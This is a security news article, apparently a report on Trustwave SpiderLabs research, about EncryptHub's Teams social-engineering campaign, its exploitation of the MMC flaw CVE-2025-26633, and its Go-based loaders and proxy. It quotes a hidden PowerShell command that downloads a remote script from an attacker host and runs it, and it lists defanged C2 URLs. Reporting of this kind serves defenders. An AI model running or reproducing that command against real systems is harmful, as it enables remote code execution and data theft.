Redazione RHC : 15 August 2025 14:42
The research team at Trustwave SpiderLabs has identified a new wave of EncryptHub attacks that combine human error and the exploitation of a vulnerability in the Microsoft Management Console. Operators pose as support staff, contact them via Microsoft Teams, and then convince the “customer” to open remote access and execute a series of commands, before deploying the payload for the CVE-2025-26633 bug, known as MSC EvilTwin.
At the same time, the group uses non-standard distribution channels, including the Brave support platform, which complicates traffic filtering and incident analysis. Reports also list other names from the same team: LARVA-208 and Water Gamayun; Previously, the group had been associated with attacks against Web3 developers and abuse of the Steam platform, and as of February, 618 organizations worldwide had been compromised.
The first step is social engineering. The victim receives a Teams request from an “IT person,” after which the contact insistently offers to start a remote session and “check settings.” Once the session is established, a line like this is executed on the machine:
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command “Invoke-RestMethod -Uri ‘hxxps://cjhsbam[.]com/payload/runner.ps1’ | Invoke-Expression”
This call downloads and executes the runner.ps1 script, which provides a springboard for exploiting the vulnerability. MMC.
Then comes the trick with duplicate .msc files. The loader creates two console files with the same name: a “clean” copy is placed in the expected directory, and a malicious copy is placed in the MUIPath path, usually the en-US directory. When the legitimate snap-in is launched, the mmc.exe process appears and, due to the EvilTwin MSC bug, first searches for the file with the same name in MUIPath. As a result, the system detects the “mirror” from en-US and executes the attackers’ code. Although the flaw was publicly described as a zero-day in March 2025, samples of such files were found in active attacks as early as February; There is a patch, but reception still works on unpatched stations.
After disposing of the duplicates, runner.ps1 modifies the contents of the malicious snap-in: the htmlLoaderUrl placeholder is replaced with the address of the EncryptHub command and control node, a string like hxxps://cjhsbam[.]com/payload/build[.]ps1. After receiving the link, .msc executes the next step.
The build.ps1 script collects system “fingers” and sends them to C2, registers the autorun mechanism, manages the communication channel, and waits for the task to execute. The commands are received in encrypted form (AES), decrypted locally, and executed directly on the node via Invoke-Expression. Typical modules include the PowerShell Fickle Stealer stealer, which extracts sensitive files, environmental information, and crypto wallet data.
During the investigation, additional Go tools emerged, with which operators are gradually replacing PowerShell scripts. One of these, SilentCrystal, replicates the bootloader logic but is compressed into a native binary. First, a pseudo-system folder “C:WindowsSystem32” is created with a space after the word “Windows,” which visually copies the real directory and confuses security tools. Then, the sample sends a POST to the control server with a hard-coded “API key” and a random filename with a .zip extension; in response, a legitimate link to Brave support is sent.
Newbies aren’t allowed to upload attachments to this site, which means EncryptHub has an account with upload rights. The archive from Brave support is downloaded and unpacked, after which the {URI} placeholder in WF.msc is replaced with the command center address. Next, the standard .msc is launched, and thanks to CVE-2025-26633, the console detects the substitution from the “false” directory and executes the requested code.
Another interesting discovery is a “bookmark proxy” in Go with SOCKS5 support. Without parameters, it starts as a client, connects to the attackers’ “hosting” using the details hardcoded in the binary, and diverts traffic through a tunnel. There’s also a server mode: a file with authentication data is uploaded, a self-signed TLS certificate is automatically generated (the Common Name field contains the Reverse Socks line and the DNS name is localhost), after which the process begins accepting multiple connections, parallelizing processing via goroutines. When a connection is established, the agent logs into Telegram with the “start” state, where it substitutes the username, domain from the USERDOMAIN environment variable, the result of verifying administrative rights via a network session call, as well as the public IP, geotag, and provider upon request to https://ipinfo.io/json. Infrastructure analysis revealed payload requests to hxxps://safesurf.fastdomain-uoemathhvq.workers.dev/payload/pay[.]ps1, another piece of the C2 framework.
Redazione